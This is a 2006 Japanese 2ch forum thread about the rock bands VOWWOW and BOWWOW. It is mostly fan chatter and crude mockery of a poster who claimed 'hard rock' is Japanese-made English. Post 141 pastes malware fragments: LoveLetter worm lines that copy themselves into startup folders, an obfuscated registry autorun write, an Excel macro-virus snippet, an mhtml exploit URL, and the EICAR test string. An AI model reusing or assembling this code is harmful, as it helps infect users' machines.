5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

VOWWOW☆BOWWOW総合スレ 12

1 :1:2006/07/06(木) 09:12:22
VOWWOW のスレッド
http://salami.2ch.net/hrhm/kako/967/967106697.html
VOWWOW のスレッド 2
http://salami.2ch.net/hrhm/kako/990/990207209.html
VOWWOW のスレッド 3
http://music.2ch.net/hrhm/kako/1001/10014/1001462496.html
VOWWOW のスレッド 4
http://music.2ch.net/hrhm/kako/1018/10183/1018367202.html
VOWWOW のスレッド X
http://music2.2ch.net/test/read.cgi/hrhm/1033383321/
【VIBe】VOW WOWのスレ6【Helter Skelter】
http://music2.2ch.net/test/read.cgi/hrhm/1048739094/
☆VOW WOWのスレッド〜パート7〜MOUNTAIN TOP☆
http://music4.2ch.net/test/read.cgi/legend/1062839327/
BOWWOWVOWWOW総合スレ8
http://music4.2ch.net/test/read.cgi/legend/1086690976/
BOWWOW VOWWOW総合スレ 9
http://music4.2ch.net/test/read.cgi/legend/1110827883/
BOWWOW☆VOWWOW総合スレ 10
http://music4.2ch.net/test/read.cgi/legend/1126977817/
BOWWOWVOWWOW総合スレ 11
http://music4.2ch.net/test/read.cgi/legend/1147965717/

2 :伝説の名無しさん:2006/07/06(木) 09:32:03
カンバック ラバアゲーン 今ならばまだ間に合うぜ

ゲッミー トゥュァ ハー 俺の愛でうずめてやーるー 


3 :伝説の名無しさん:2006/07/06(木) 09:45:25
とりあえず、hard rockは和製英語という結論です。これは定説なんです。
サイババの勝手です。

分りましたか?

4 :伝説の名無しさん:2006/07/06(木) 09:47:32
ちなみに“Hard Rock”というのは、和製英語らしいね。
アタマの具合悪いのか?ルビふろうか?w

WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW

5 :伝説の名無しさん:2006/07/06(木) 11:28:30
ちなみに“Hard Rock”というのは、和製英語らしいね。

wwwwwwwwwwwwwwwwwwwwwwwwww


6 :伝説の名無しさん:2006/07/06(木) 11:35:00
バウワウファンの間では“Hard Rock”というのは、和製英語ということになってます。

アタマの具合が悪い人間ばっかりなのでルビふって許して下さい。


7 :伝説の名無しさん:2006/07/06(木) 12:29:15
ちなみに“Hard Rock”というのは、和製英語らしいね。

wwwwwwwwwwwwwwwwwwwwwwwwww


8 :伝説の名無しさん:2006/07/06(木) 14:20:55

和製英語肯定バカ・否定キチガイとも、スレ荒らしの

自作自演の一人芝居だからスルーして下さい。

VOWWOWスレはスマートで気持ちの良いスレで行きましょう。


9 :伝説の名無しさん:2006/07/06(木) 14:29:09

まあ、単にスレを荒らす意図でやっているだけか、ガチの人格障害者だろうね。


10 :伝説の名無しさん:2006/07/06(木) 16:07:23
>>1

11 :伝説の名無しさん:2006/07/06(木) 17:40:14
ちなみに“Hard Rock”というのは、和製英語らしいね。

wwwwwwwwwwwwwwwwwwwwwwwwww

おい、なんでBOW糞も一緒のスレタイなんだ?
削除要請出します。

12 :伝説の名無しさん:2006/07/06(木) 18:11:10
>>8
一人じゃないよwwww

13 :伝説の名無しさん:2006/07/06(木) 18:46:47
>>11
BOWWOW30周年の一環でVOWWOW再発が出来てるんだから有難いと思わなくちゃ。

そもそもVOWWOW解散のとき「15年間ありがとう!」っていう雰囲気だったのにな。
いつからハッキリ分けて考えるようになったんだろう。

14 :伝説の名無しさん:2006/07/06(木) 20:50:02
まるでブリザードの水野否定派みたいだな

15 :伝説の名無しさん:2006/07/06(木) 21:33:16
もうあれが嫌だこれが嫌だなんて言ってる場合じゃないのにな

16 :伝説の名無しさん:2006/07/06(木) 21:40:23
カンバック ラバアゲーン 今ならばまだ間に合うぜ

ゲッミー トゥュァ ハー 俺の愛でうずめてやーるー 

17 :伝説の名無しさん:2006/07/06(木) 21:45:26
BOW WOWはきめえ

18 :伝説の名無しさん:2006/07/06(木) 22:23:06
VOW WOWファンってどーしてこーしつこくキモイんだ?厚見好きなプログレヲタかよ


19 :伝説の名無しさん:2006/07/06(木) 22:57:48
しつこくて理屈ぽい

20 :伝説の名無しさん:2006/07/07(金) 03:44:44
>>16
ストーンズやロッドやKISSまでもがDISCO調の曲を出す中
BOWWOWで唯一ディスコサウンドを取り入れた意欲作と言えるでしょう
イントロはモロ「神様御願い」だが。
>忘れかけてたラブソング



21 :伝説の名無しさん:2006/07/07(金) 11:28:22
>>20
そうか!その頃に日本から初めて欧米諸国にhard rockという言葉が輸出され始めたんだね!
hard rockってディスコ以降に誕生した和製英語なんだね!

すっごーーいwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

22 :伝説の名無しさん:2006/07/07(金) 13:47:47
和製英語の前スレのオヤジ、神のレベルだな。あの発言と後のフォローはやっぱりエグい。

23 :伝説の名無しさん:2006/07/07(金) 16:05:41
http://music4.2ch.net/test/read.cgi/legend/1147965717/528

24 :伝説の名無しさん:2006/07/07(金) 16:13:31
  ||// ∧_∧|∧_∧
  ||/  ( ´・ω・)(    ) うんこくさい
  ||   (    )|(  ● )
    ̄ ̄ ̄ ̄ ̄ u―u'

   _____
  ||// ∧_∧|∧_∧
  ||/  (n´・ω・)n   ) でもうんこついてない
  ||   (ソ  丿|ヽ ● )
    ̄ ̄ ̄ ̄ ̄ u―u'

   _____
  ||// ∧_∧|∧_∧
  ||/ r(    (n´・ω・`n) うんこついてないのにうんこくさい
  ||  ヽ  ● )|(     )
    ̄ ̄ ̄ ̄ ̄ u―u'


25 :伝説の名無しさん:2006/07/07(金) 17:46:49
↑ついてるよw

26 :伝説の名無しさん:2006/07/07(金) 17:52:38
>>24
 オマ●コ?

27 :伝説の名無しさん:2006/07/08(土) 07:21:41
BOW WOWはきめえ!Bファンは少しサヨみたいな時代錯誤多し!
VOWWOWデビュー直後の東大五月祭で実感!
まじ、危険を感じたよ、変な意味で。
それから俺は、BファンのことをBOOWOWと呼び、近寄らないようにしてる。
ブーワウ!!wwwww

28 :伝説の名無しさん:2006/07/08(土) 08:50:44
SHot in the Dark

29 :伝説の名無しさん:2006/07/08(土) 11:25:32
27のことは人間的に嫌いじゃないタイプだと思う。

でも和製英語のオヤジは人間的にも最低だと思う。

30 :伝説の名無しさん:2006/07/08(土) 11:30:03
なんてったってWikiがソースで定説らしいからw

31 :伝説の名無しさん:2006/07/08(土) 13:21:13
マジでレスしていい?どこのバカが言ってるんだよ、それ。
hard rockが和製英語な訳ないだろ!Wikiがソースで断言してるバカは氏んでいいよ。

32 :伝説の名無しさん:2006/07/08(土) 13:30:23
>>31
すまないが、それを和製英語発言オヤジにも読めるようにルビをふってやってくれw

33 :伝説の名無しさん:2006/07/08(土) 13:32:58
hard rockは和製英語であるとWikiに書いてある。
どうした。アタマの具合悪いのか?w

字読める?
ルビふろうか?w


34 :伝説の名無しさん:2006/07/08(土) 13:35:45
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

35 :伝説の名無しさん:2006/07/08(土) 13:42:00
hard rockが和製英語なんて

                   ∧∧ ∩
                  (´・ω・`)/
             ハ_ハ   ⊂   ノ    ハ_ハ
           ('(・ω・`∩  (つ ノ   ∩´・ω・)')
       ハ_ハ   ヽ  〈    (ノ    〉  /    ハ_ハ
     ('(・ω・`∩  ヽヽ_)        (_ノ ノ   ∩´・ω・)')
     O,_  〈                      〉  ,_O
       `ヽ_)                     (_/ ´
   ハ_ハ           知 ら ん が な           ハ_ハ
⊂(・ω・⊂⌒`⊃                       ⊂´⌒⊃・ω・) ⊃


36 :伝説の名無しさん:2006/07/08(土) 15:16:53
「ソースは?」
                   ∧_∧
                   (´∀`*)  ウィキペディアに書いてあった。
                     U θ U
                 / ̄ ̄T ̄ ̄\
                |二二二二二二二|
                |        |
パシャ パシャ  パシャ パシャ パシャ  パシャ パシャ パシャ パシャ パシャ
   パシャ パシャ パシャ パシャ パシャ  パシャ パシャ パシャ  パシャ  パシャ
 ∧_∧      ∧_∧     ∧_∧  ∧_∧    ∧_∧     ∧_∧
 (   )】      (   )】    (   )】 【(   )    【(   )    【(   )
 /  /┘ .   /  /┘.    /  /┘ └\ \   └\ \   └\ \
ノ ̄ゝ     ノ ̄ゝ      ノ ̄ゝ     ノ ̄ゝ    ノ ̄ゝ     ノ ̄ゝ


37 :伝説の名無しさん:2006/07/08(土) 16:11:34
>>36
GJ!バロスwww

38 :伝説の名無しさん:2006/07/08(土) 16:12:28
hard rockは和製英語であるとWikiに書いてある。
どうした。アタマの具合悪いのか?w

字読める?
ルビふろうか?w

wwwwwwwwwwwwwwwwwwwww

39 :伝説の名無しさん:2006/07/08(土) 16:18:49
和製英語発言のオッサン、相当アタマ悪いなw
この人、字が読めても脳ミソが機能してないじゃん
自分でご丁寧に墓穴まで掘ってるしw

恥ずかしいからバウワウのファンを辞めてラウドのファンにでもなってくれ

40 :伝説の名無しさん:2006/07/08(土) 16:43:30
この和製英語バカって昔、アークエナミーのスレで笑いものにされてたヤツと一緒のヤツじゃね?

アーチエナミーが正しい読み方で、英語でchの発音は全部「チ」だから「ク」って読むヤツはアホ
だとか言って、調子に乗って
「英米ではTechnoを『テチノ』と読む。これが正しい読み方だ。」
とか言ったあの厨房に言動が似てるように思えて仕方が無いんだが。

41 :伝説の名無しさん:2006/07/08(土) 16:56:23
一応、主要な流れを貼っておこう
http://music4.2ch.net/test/read.cgi/legend/1147965717/528-635

42 :伝説の名無しさん:2006/07/08(土) 18:30:13
そんなに祭りにするほどの事か?
ハードロックが和製英語だったら何が悪いのよ。
普通の簿人間にとっちゃ、どっちだっていいんだよ。
そんなの。
まさに粘着性人格障害だな。

「wwww」厨はウザイから首吊って死ねよ。

43 :伝説の名無しさん:2006/07/08(土) 18:45:57
↑Wiki厨乙!

44 :伝説の名無しさん:2006/07/08(土) 22:36:52
他にこれといったネタが無いので続いてるだけだと思う


45 :伝説の名無しさん:2006/07/08(土) 23:24:00
というか、とてもステキな燃料なだけですw
こんなバカ、そう滅多に居ないからね。

特に「ルビ」発言で痛さ全開ですからね。そう簡単に人々は忘れませんよwww

46 :伝説の名無しさん:2006/07/08(土) 23:24:59
氏ぬべきは和製英語発言の42だろw
氏ね。マジで。

47 :伝説の名無しさん:2006/07/08(土) 23:43:53
>>42
神の降臨ですかw
敢えていうなら、えーっと、あれだけ偉そうに言っておいて今更なにをwww

wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

じゃ、頼むから、ルビふってくれwwwwwwwwwwwww

48 :伝説の名無しさん:2006/07/09(日) 00:07:35
hard rockが和製英語な訳ないだろ
おめーら本当にバカか?

49 :伝説の名無しさん:2006/07/09(日) 00:10:50
>>48
ちょっと待て。前スレの528=635、およびこのスレの42だけがそのバカ者だ。
俺らは無関係だよ。

50 :伝説の名無しさん:2006/07/09(日) 00:12:18

(゚∠゚)ニホンゴムズカスィ




51 :伝説の名無しさん:2006/07/09(日) 00:16:57
>>42

「盗人猛々しい」とは正にこのことだなwww

52 :伝説の名無しさん:2006/07/09(日) 00:21:41
(゚∠゚) hard rock ハ、ジャパニーズエイゴデスネエ〜。ベーダーニハ、ツウジマッセーン

53 :伝説の名無しさん:2006/07/09(日) 00:28:26
ミスター・ベーダーかよwww

54 :伝説の名無しさん:2006/07/09(日) 00:35:25
和製英語派って、みっともないよw
もう降参しなよwww

55 :伝説の名無しさん:2006/07/09(日) 00:37:51
ちなみに“Hard Rock”というのは、和製英語らしいね。
アタマの具合悪いのか?ルビふろうか?w


これは神の発言です。

56 :伝説の名無しさん:2006/07/09(日) 00:38:29
神じゃない。ネ申だよ。

57 :伝説の名無しさん:2006/07/09(日) 00:39:51
早やッ!!!!w

58 :伝説の名無しさん:2006/07/09(日) 00:40:28
ちなみに“Hard Rock”というのは、和製英語らしいね。
アタマの具合悪いのか?ルビふろうか?w

wwwwwwwwwwwwwwwwwwwwwwwww

59 :伝説の名無しさん:2006/07/09(日) 00:43:29
神の再降臨はまだデツか?

60 :伝説の名無しさん:2006/07/09(日) 06:49:53
SHIT in the dark!

61 :伝説の名無しさん:2006/07/09(日) 08:23:08
みんな退屈してるんだな

その労力をアメリカライブ実現に向けて使えばいいのに

62 :伝説の名無しさん:2006/07/09(日) 08:37:14
>>61
“みんな”じゃなくて“一人だけ”ですから。
粘着してんのは。

ここはIDが出ないから自演し放題。

63 :伝説の名無しさん:2006/07/09(日) 09:23:43
DVDが出てから
スレ住人のレベルが下がったように思うがどうよ
中身なさずぎ
それより9月発売の再発の利マスター
内容などの情報をくれよ

SMBも8月に出すみたいだし
まとめて何枚買うか計算しとかなきゃなんないし
SMBを4枚(黒船、3rd、ライブUK、天晴)
VOWは4枚(2、3、5、6)の8枚購入の予定だが
海栗でBOX作るなら全部買うし・・
早く詳細が知りたい

64 :伝説の名無しさん:2006/07/09(日) 09:51:17
情報クレクレ厨もレベルがアレだと思うけど。

65 :伝説の名無しさん:2006/07/09(日) 10:07:19
>>63
DVDが出てからではない
HardRockは和製英語だってね、という書き込みがされてからだ

66 :伝説の名無しさん:2006/07/09(日) 11:03:28
いずれにしろ住人自身がレベルの低さ(高さ)を語るのは滑稽

67 :伝説の名無しさん:2006/07/09(日) 11:11:59
66がいいこといった!

68 :伝説の名無しさん:2006/07/09(日) 11:51:26
65もいいこと言ってるぞ!

69 :伝説の名無しさん:2006/07/09(日) 12:11:44
SMBってナニ?

70 :伝説の名無しさん:2006/07/09(日) 12:19:16
おっちゃんなら黒船でわかろー
サディスティック・ミカ・バンドでしょ

71 :伝説の名無しさん:2006/07/09(日) 12:22:56
hard rock和製英語おやじは結局、納得した上でスルーを決め込んでるのか?
それとも今だにWikiを信じ込んでるのかw

72 :伝説の名無しさん:2006/07/09(日) 12:34:11
ただ単に恥ずかしくて逃げてるだけじゃねw

73 :伝説の名無しさん:2006/07/09(日) 12:40:36
ミカバンドかーおっちゃんやけど三十路目前なんSMBではわかりませんでした。

74 :伝説の名無しさん:2006/07/09(日) 13:08:51
三十路手前は青春まっさかりです。オサーンじゃありません!

75 :伝説の名無しさん:2006/07/09(日) 16:35:30
三十路超えると、見た目の"青春度"は個人差が広がってくるがねw

76 :伝説の名無しさん:2006/07/09(日) 16:45:04
>>74
大学生の俺からみたらおっさんだよ充分

77 :伝説の名無しさん:2006/07/09(日) 19:17:31
いやん


78 :伝説の名無しさん:2006/07/09(日) 20:09:41
きんもー★

79 :伝説の名無しさん:2006/07/09(日) 20:23:43
きんもーいオヤジが一言。

hard rockは和製英語という定説です。Wikiに書いてあるから、間違いナイ!

80 :伝説の名無しさん:2006/07/09(日) 20:35:04
\(゚皿゚)/ 緊急報告!

糞スレ指数が90に上昇!


81 :伝説の名無しさん:2006/07/09(日) 21:57:10
hard rockが和製英語だと言う人間がいるだけで糞スレ決定なんだがな

82 :伝説の名無しさん:2006/07/09(日) 22:04:03
和製英語発言よりも、俺はルビ発言の時の方が藁なんだけどw
バカ丸出しwww

考えて見れば、あの和製英語発言から糞スレに成り下がったな。

83 :伝説の名無しさん:2006/07/09(日) 22:10:04
ロクな教育受けてないオヤジがインターネットでインテリ気取りしてるとこういう目に遭うんだよ
Wikiを見て鵜呑みにするバカは低学歴低脳中年の証拠もう許してやれば
もしくは和製英語論議専用の新スレを立ち上げればいいと思う

84 :伝説の名無しさん:2006/07/09(日) 22:13:25

句読点くらい打て!

85 :伝説の名無しさん:2006/07/09(日) 22:15:49
    ,rn                       \从从从从从从从从从从/
   r「l l h.                      ≫
   | 、. !j         /           /  ≫  みんな〜
   ゝ .f  /      _             ≫  
   |  |       ,r'⌒  ⌒ヽ、.         ≫   お待たせ〜〜っ♪
   ,」  L_     f ,,r' ̄ ̄ヾ. ヽ.  / ./   ≫ テポドンいくぞ〜〜〜〜〜〜〜〜〜
  ヾー‐' |     ゞ‐=H:=‐fー)r、)  ./      /WWWWWWWWWW\
   |   じ、     ゙iー'・・ー' i.トソ
   \    \.     l、 r==i ,; |'
    \   ノリ^ー->==__,..-‐ヘ__.  /   /|  /
      \  ノ ハヽ  |_/oヽ__/   /\   /  |_  ゴゴゴゴ…
       \  /    /       /  \./  /  ヽ___
         \'    |o    O  ,|    \ ../   /   /
          y'   |        |\/  |   ./   /
          |     |o        |/| _ |  ./__/
          |    |       |  「  \:"::/
          ヾニコ[□]ニニニ  |   ⌒ リ川::/
          / \      /  \  ...::::/
         /    ゞ___     \/  /
           /     /    \.     \  /
        /  ゝ /       .::\ /    |
          |   /      ....:::::::::/\<    |    /
          | /      ...::::::::::/  |   |     /
       /      ....:::::::/    |     .|
      /      ...::::::::/     |   |
    /      .....::::::/       |___|   /
   /''' ....   ...:::::::::/         (   \__
   /     ...:::::::::/           ゙-'`ー---'


86 :伝説の名無しさん:2006/07/09(日) 22:18:22
>>83
まあ、確かにあのオヤジは低脳丸出しだったが、オマエの分析力も凄いよw
多分、プロファイリングとしては的中してんだろなw
GJ!

87 :伝説の名無しさん:2006/07/09(日) 22:19:12
BOWWOWと一緒だけで糞スレ決定!
BOWWOWWOWなら歓迎だけど、アナベラちゃーん!!

88 :伝説の名無しさん:2006/07/09(日) 22:20:02
>>87
アナベラちゃん、ナツカスィ〜www

89 :伝説の名無しさん:2006/07/09(日) 22:20:40
それでもまだ、あのアホは和製英語だという主張を変えていないので糞スレ決定

90 :伝説の名無しさん:2006/07/09(日) 22:21:43
もうイジめるなよw

91 :伝説の名無しさん:2006/07/09(日) 22:24:03
本当に、あほだなあwww
http://music4.2ch.net/test/read.cgi/legend/1147965717/528-635

92 :伝説の名無しさん:2006/07/09(日) 23:29:33
やっぱり和製英語オヤジはウザかった。消えてくれて嬉しいからそろそろ忘れよう。

93 :伝説の名無しさん:2006/07/10(月) 00:58:49
>>77
HIPHOPのBOWWOWじゃないとこが
加齢臭を感じるネタだな。

94 :伝説の名無しさん:2006/07/10(月) 06:23:41
ちなみに“Hard Rock”というのは、和製英語らしいね。
アタマの具合悪いのか?ルビふろうか?w

wwwwwwwwwwwwwwwwwwwwwwwww


95 :伝説の名無しさん:2006/07/10(月) 07:40:09
hard rockを和製英語と主張してる段階でDQNな加齢臭を感じたよw
アタマの具合悪さ全開だなwwwwwwwwwwwwwwwwww

96 :伝説の名無しさん:2006/07/10(月) 08:13:01
>ちなみに“Hard Rock”というのは、和製英語らしいね。
>アタマの具合悪いのか?ルビふろうか?w

今、読み返すと本当に凄まじいドクソ具合だなwwwww
当分晒してもいいかもな。

97 :伝説の名無しさん:2006/07/10(月) 08:13:03
んで、他に言うことは?




・・・




そうかぁ、思い付かないんだ。
それで、ループに自分から乗っかるしか・・・カワイソス

98 :伝説の名無しさん:2006/07/10(月) 08:14:11
>>97
おは。早朝からご苦労!

99 :伝説の名無しさん:2006/07/10(月) 08:15:27
>>97
アタマの具合悪いのか?ルビふろうか?w


100 :伝説の名無しさん:2006/07/10(月) 08:25:17
どこの自動音案内だよw

101 :伝説の名無しさん:2006/07/10(月) 09:02:12
どうでもいいけど、みっともないぞ。

102 :伝説の名無しさん:2006/07/10(月) 09:06:23
アタマの具合悪いのか?ルビふろうか?w

103 :伝説の名無しさん:2006/07/10(月) 09:08:46
いい歳こいて和製英語発言はプゲラだ。まさにみっともない。

104 :伝説の名無しさん:2006/07/10(月) 10:06:40
もう恭司さんネタは話さないのか?

105 :伝説の名無しさん:2006/07/10(月) 11:53:30
>>104
ルビをふったらいいと思いますw

106 :伝説の名無しさん :2006/07/10(月) 13:51:56
痛くて、あ・る・け・な〜〜〜い!!!


107 :伝説の名無しさん:2006/07/10(月) 15:26:35
アチャマがイタ〜〜イ!

108 :人見元基:2006/07/10(月) 15:30:18
このスレも書込みやめましょう。削除依頼出すんで。
変なのが来たおかげで、みっともないスレになってしまいました。

しばらくVOWWOWスレは凍結して、いずれ新たに立てればいいです。

109 :伝説の名無しさん:2006/07/10(月) 16:23:55
亀ですが…YouTUBEに貴重な映像アップしてくれた諸氏、
本当にありがとうございました。身震いしながら見てました。

110 :伝説の名無しさん:2006/07/10(月) 17:19:11
勝手に閉鎖を決めるなよ!なんで無関係な話題までまき沿い喰らわねばならないんだよ。

111 :伝説の名無しさん:2006/07/10(月) 21:13:32
勝手に閉鎖を決め込み削除しようとするようなやつはHardRockは和製英語だ、などと言い出すバカよりよっぽど変人


112 :伝説の名無しさん:2006/07/11(火) 00:15:55
>>63
海栗ってなに?
うに?シーマロン?

113 :伝説の名無しさん:2006/07/11(火) 01:02:39
海栗=ディスクユニオン=UNIONのローマ字黄泉

114 :伝説の名無しさん:2006/07/11(火) 11:05:44
ハードロックって和製英語なんですって?

自分の今までの無知を恥じます。。。orz

115 :伝説の名無しさん:2006/07/11(火) 12:14:13
違います、リッチーは昔自分達はハードロックバンドと言ってました
間違いです

116 :伝説の名無しさん:2006/07/11(火) 13:04:12
>>115
リッチーサンボラが、そんなことを…。

やっぱり80年代初頭以前はハードロックって言葉はなかったのですね… orz

117 :伝説の名無しさん:2006/07/11(火) 16:44:33
つまんないよ。

118 :伝説の名無しさん:2006/07/11(火) 19:09:57
ライオネル リッチーの方だろ

119 :伝説の名無しさん:2006/07/11(火) 20:42:25
The Whoの映画「Kids are alright」の中で出てくる70年代前半当時の記録映像でナンチャラっていう有名な映画監督が
思いっきり「hard rock」って言葉を怒鳴ってるんだが。それもきっと何かの間違いなんだよw

何せ、hard rockは日本人の発明した言葉ですからwww

120 :伝説の名無しさん:2006/07/11(火) 22:21:05
どーでもいいが、B糞スレはHR/HM板にあるだろうが。
VOWWOW単独スレで立て直してください。
でなければ、削除要請出すよ。

121 :伝説の名無しさん:2006/07/11(火) 22:56:06
>>120
どさくさ紛れにしつこいプログレVOWヲタが・・・

いい加減おまえ1人の意見だって悟ってくれ
和製英語野郎の百倍くらいキモクて鬱陶しいから

122 :伝説の名無しさん:2006/07/12(水) 00:06:08
プログレ板見てきた・・。なんなんだろうねえ

123 :伝説の名無しさん:2006/07/12(水) 04:15:12
ハードロックって和製英語なんだってね!

目からウロコですwww

124 :伝説の名無しさん:2006/07/12(水) 10:47:22
>>123
しつこいぞ!おまえ、いいかげんにしろ。字よめないのか?アタマの具合悪いのか?
でないと、ルビふるぞ!

wwwwwwwwwwwwwww

125 :伝説の名無しさん:2006/07/12(水) 11:47:09
覇亜怒六区は英語ですよ?
バカですか?

126 :伝説の名無しさん:2006/07/12(水) 12:12:27
山本恭司は和製八代亜紀でつか?

127 :伝説の名無しさん:2006/07/12(水) 13:46:43
Wikiがソースの和製英語説。それを支持しない限り、アタマの具合が悪いんだよw
字が読めないなら、ルビふってくれるらしいしw

恭司もいいファンを持ったよなwww

128 :伝説の名無しさん:2006/07/12(水) 15:21:37
おやじの雑学って普通はカッチョいいんだけど、ここまでドクソって(ry

129 :伝説の名無しさん:2006/07/12(水) 19:14:17
>>126
八代のうたは恭司のギターに通じるものがある
よってまんざら間違いでもない

130 :伝説の名無しさん:2006/07/12(水) 22:13:14
>>122
本当プログレヲタのVOW好きキモイ

131 :伝説の名無しさん:2006/07/13(木) 08:17:51
Vファンの中でもIII派とX派がいるんだよね?
皆はどっちかな?

おれは100%のIII派だ。Xもいいアルバムだが、IIIほど燃えん。

132 :伝説の名無しさん:2006/07/13(木) 10:44:22
おれの場合、アルバム単位だと山頂派になるかな



133 :伝説の名無しさん:2006/07/13(木) 12:07:59
BOW WOWはきめえ!Bファンは少しサヨみたいな時代錯誤多し!
VOWWOWデビュー直後の東大五月祭で実感!
まじ、危険を感じたよ、変な意味で。
それから俺は、BファンのことをBOOWOWと呼び、近寄らないようにしてる。
ブーワウ!!wwwww


134 :伝説の名無しさん:2006/07/13(木) 12:12:28
>>132
実は俺も

135 :伝説の名無しさん:2006/07/13(木) 13:50:40
>>133>>34
マジ?過去スレでは、かなりボロクソな評価だったが。


136 :伝説の名無しさん:2006/07/13(木) 14:44:50
キヨシロー、喉頭癌だって。びっくり。
厚見さんツアーの仕事なくなっちゃったね。
RCも昔よく見に行ったから早く良くなってほしいな。

137 :伝説の名無しさん:2006/07/13(木) 18:31:32
X派はプログレヲタ

138 :伝説の名無しさん:2006/07/13(木) 20:26:06
>>135
武道館DVD見てマウンテントップの評価が変わった
当時のバーンで酒井康も指摘してたけど曲が多すぎた。
イギリス時代の録音のシングル2曲を入れたことで
散漫な印象になってたような。                  

139 :伝説の名無しさん:2006/07/13(木) 21:42:50
普段、山頂を聴くときはCD-Rで曲順変えて焼いたので聴いてる
シングル2曲を最初に持ってきて後は順次繰り下げね
こうするととくにプログラム再生しなくても
3曲目からの再生で実質的なアルバム構成で聴けるから

140 :伝説の名無しさん:2006/07/13(木) 22:43:10
そうねー。
でも、最後のアルバムの最後に入っている曲が
I'M GONNA SING THE BLUESってところで
また泣いちゃう自分がいるのだ。

141 :伝説の名無しさん:2006/07/13(木) 22:57:10
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

142 :伝説の名無しさん:2006/07/14(金) 00:12:27
↑なんだコレ? ウィルスコードか?
携帯だから関係ないけど。

143 :伝説の名無しさん:2006/07/14(金) 15:03:17
あげ

144 :伝説の名無しさん:2006/07/14(金) 15:48:47
>>142
セキュリティソフトが反応するらしい。
実行されないから大丈夫かと思うが、普段気を配ってない人は気をつけて。

145 :伝説の名無しさん:2006/07/14(金) 17:42:37
伝説板の他スレでも張られてるね>141

146 :伝説の名無しさん:2006/07/15(土) 11:21:57
VOWは、金に糸目をつけないプログレ親父ヲタも支持してるからこそ
HMファン層だけの BOWより、
CD、DVDが売れるんですよ
なんせ、プログレ親父世代は、小金もってますけん
商売にはなりますけん

147 :伝説の名無しさん:2006/07/15(土) 11:36:24
ショック! うえ〜 ブス

148 :伝説の名無しさん:2006/07/15(土) 13:09:50
暗い〜野茂

149 :伝説の名無しさん:2006/07/15(土) 15:44:35
>>146
BOWWOW好きオヤジは、金があっても
ギターやアンプに流れてしまうからな。
意外に過去音源もアナログのままだったり。

150 :伝説の名無しさん:2006/07/15(土) 19:42:09
カネがあるとアナログ盤の方が楽しめそうだな

151 :伝説の名無しさん:2006/07/15(土) 23:30:00
>>146
〜けん、っていうのは広島〜松江あたりの言葉っぽいな。



152 :伝説の名無しさん:2006/07/15(土) 23:30:27
張り拳

強引セイン

153 :伝説の名無しさん:2006/07/15(土) 23:31:29

実際、アナログ盤の方がいい音はする。



154 :伝説の名無しさん:2006/07/15(土) 23:32:19
>>146
>>149
つーことは、CDやDVDで済まされない分
BOWWOW好きオヤジのほうが金持ちってことなのか。

155 :伝説の名無しさん:2006/07/16(日) 08:38:10
甘いな君
CD、DVDのコレクションて1枚や2枚じゃないのよ
プログレ親父の場合・・
ウン百枚は当たり前、ウン千枚って奴もザラにいる
毎週毎週、20枚以上ウニオンにCD売りに行く香具師もいる
金のかけ方が半端じゃない
そういう奴が、購買層にてくれるんだよVOWは
総投資額は怖くて集計できないくらい

156 :伝説の名無しさん:2006/07/16(日) 08:48:18
>153
当然だが、再生装置次第。
しかしV辺りはアナログで迫力V倍増。

157 :伝説の名無しさん:2006/07/16(日) 09:45:42
ベスト盤の音質を教えてください。

158 :伝説の名無しさん:2006/07/16(日) 09:58:03
>>156
いくら位のレコードプレーヤー買ったら良いの?

159 :伝説の名無しさん:2006/07/16(日) 10:07:32
CDは硬いというか平面的な音しか出ないから、立体感はアナログの方が上。
但し、それもオーディオ機材にある程度の金をかけた場合。
大体、聞けば聞くほど確実に劣化していくアナログ盤の
しかもVOWWOWみたいに20年近く前に出た盤が
CDより音質が優れてるなんてありえない。

160 :伝説の名無しさん:2006/07/16(日) 11:22:08
PFMの幻の映像なんかLPで聞いたほうが全然良いねもう20年以上前の盤だけどさ

161 :伝説の名無しさん:2006/07/16(日) 12:07:54
なぜ例えがPFMだ?

162 :伝説の名無しさん:2006/07/16(日) 12:19:18
わかりやすいからでないの

163 :伝説の名無しさん:2006/07/16(日) 13:21:44
アツミと同じプログレヲタだから

164 :伝説の名無しさん:2006/07/16(日) 14:28:01
プログレならそれこそ他にいくらでもあるだろ

165 :伝説の名無しさん:2006/07/16(日) 14:51:03
もうLP30枚位しか持ってないんだよ全部CD−R化してしまった
BEAT OF 〜とサイクロンも盤の外周はCDより音がいいんだが
内に進むにつれ音が潰れる

